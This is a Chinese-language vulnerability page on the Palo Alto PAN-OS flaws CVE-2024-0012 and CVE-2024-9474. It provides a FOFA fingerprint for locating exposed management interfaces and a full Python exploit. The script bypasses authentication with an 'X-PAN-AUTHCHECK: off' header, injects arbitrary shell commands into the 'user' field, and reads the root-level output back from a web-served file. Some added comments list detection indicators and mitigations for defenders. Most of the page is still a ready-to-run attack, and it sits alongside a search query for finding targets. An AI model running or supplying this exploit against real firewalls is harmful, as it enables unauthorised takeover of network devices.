# PAN-OS软件中存在权限提升漏洞(CVE-2024-9474/CVE-2024-0012)

Palo Alto Networks PAN-OS 软件中存在权限提升漏洞,允许有权访问管理 Web 界面的 PAN-OS 管理员以 root 权限在防火墙上执行操作。

Cloud NGFW 和 Prisma Access 不受此漏洞影响。

## fofa

```javascript
icon_hash="873381299"
```

## poc

```python
# Proof of concept for the two CVEs named in the page title, used together:
# CVE-2024-0012 (authentication bypass on the management web interface) and
# CVE-2024-9474 (privilege escalation to root on the firewall).
#
# What the script does, as visible below:
#   1. POST to createRemoteAppwebSession.php with "X-PAN-AUTHCHECK: off" and a
#      `user` form field that wraps a shell command in backticks.
#   2. GET /index.php/.js.map with the PHPSESSID returned by step 1.
#   3. GET /unauth/watchTowr.php, the file the step-1 payload redirects the
#      command output into.
#
# Defender notes (log review / detection):
#   - "X-PAN-AUTHCHECK" arriving from a client is itself an indicator;
#     presumably it is meant to be set only by the device's own front end.
#     See the watchTowr write-up under "漏洞来源" and verify.
#   - Request paths where a .php script is followed by extra path info ending
#     in ".js.map" (both URLs in steps 1 and 2 have this shape).
#   - Form field `user` containing backticks or "$(".
#   - Unexpected files under /var/appweb/htdocs/unauth/. This script never
#     removes the file it creates, so it remains as a forensic artifact.
#   - Mitigation: restrict management-interface reachability to trusted
#     internal addresses and install the vendor's fixed PAN-OS release.
import requests
import argparse
import urllib3
import base64  # NOTE(review): imported but not used anywhere in the visible script

# Set up command-line argument parsing
parser = argparse.ArgumentParser(description="Send a POST request with a specified hostname.")
parser.add_argument("hostname", help="The hostname to be used in the request.")
parser.add_argument("command", help="Command to execute")
args = parser.parse_args()

# Assign the hostname variable
hostname = args.hostname
#lhost = args.lip
#lport = args.lport
command = args.command

# Define the proxy configuration
proxies = {
    "http": "http://localhost:8080",
    "https": "http://localhost:8080",
}
# The dict above is immediately overwritten, so by default no proxy is used.
proxies = ""  # comment line to go through the Burp Proxy
# TLS certificate verification is disabled on every request below (verify=False),
# and this call silences the warning urllib3 would otherwise print about it.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Define the URL and headers
# The trailing "/watchTowr.js.map" is extra path info appended after the .php script name.
url = f"https://{hostname}/php/utils/createRemoteAppwebSession.php/watchTowr.js.map"
header1 = {
    "Host": hostname,
    "X-PAN-AUTHCHECK": "off",  # client-supplied; see defender notes at the top
    "Content-Type": "application/x-www-form-urlencoded",
}

# Define the payload
# Both payloads place shell syntax in the `user` field and request userRole=superuser.
# payload_new is defined but never sent; only payload_orig is used below.
payload_new = (
    "user=`"+str(command)+"`"
    "&userRole=superuser&remoteHost=&vsys=vsys1"
)
# payload_orig redirects the command output into a file in the "unauth" web
# directory, which step 3 then fetches.
payload_orig = (
    "user=`echo $("+str(command)+") > /var/appweb/htdocs/unauth/watchTowr.php`"
    "&userRole=superuser&remoteHost=&vsys=vsys1"
)
print("POST : " + url)
try:
    #print(payload)
    response = requests.post(url, headers=header1, data=payload_orig, proxies=proxies, verify=False)
    print("Status Code:", response.status_code)
    if 'Set-Cookie' in response.headers and response.status_code == 200 :
        set_cookie = response.headers['Set-Cookie']
        # Look for the PHPSESSID in the Set-Cookie header
        if 'PHPSESSID=' in set_cookie:
            # Extract the PHPSESSID value
            phpsessid = set_cookie.split('PHPSESSID=')[1].split(';')[0]
            print(f"PHPSESSID: {phpsessid}")
        else:
            print("PHPSESSID not found in Set-Cookie header")
    else:
        # This branch is also taken when the status code is not 200, even if a
        # Set-Cookie header was present, so the message can be misleading.
        print("'Set-Cookie' header not found in response headers")
    print()
except requests.RequestException as e:
    print("An error occurred:", e)

# NOTE(review): `phpsessid` is bound only when the POST returned 200 with a
# PHPSESSID cookie. On any other path (request error, no cookie, non-200) the
# f-string below raises NameError, so the script stops here with a traceback.
header2 = {
    "Host": hostname,
    "Cookie": f"PHPSESSID={phpsessid};",
    "X-PAN-AUTHCHECK": "off",
    "Connection": "keep-alive"
}

# Step 2: request index.php (again with ".js.map" path info) carrying the
# session cookie from step 1. Only the status code is printed.
url2 = f"https://{hostname}/index.php/.js.map"
print("GET : " + url2)
try:
    response2 = requests.get(url2, headers=header2, proxies=proxies, verify=False)
    print("Status Code:", response2.status_code)
    print()
except requests.RequestException as e:
    print("An error occurred:", e)

# Step 3: read back the file named in payload_orig. A 200 response with content
# here means the command ran and its output was written under the web root.
url3 = f"https://{hostname}/unauth/watchTowr.php"
print("GET : " + url3)
try:
    response3 = requests.get(url3, headers=header2, proxies=proxies, verify=False)
    print("Status Code:", response3.status_code)
    print("Status Content:", response3.content)
except requests.RequestException as e:
    print("An error occurred:", e)
```

## 漏洞来源

- https://github.com/k4nfr3/CVE-2024-9474/blob/main/exploit_fw.py
- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/?123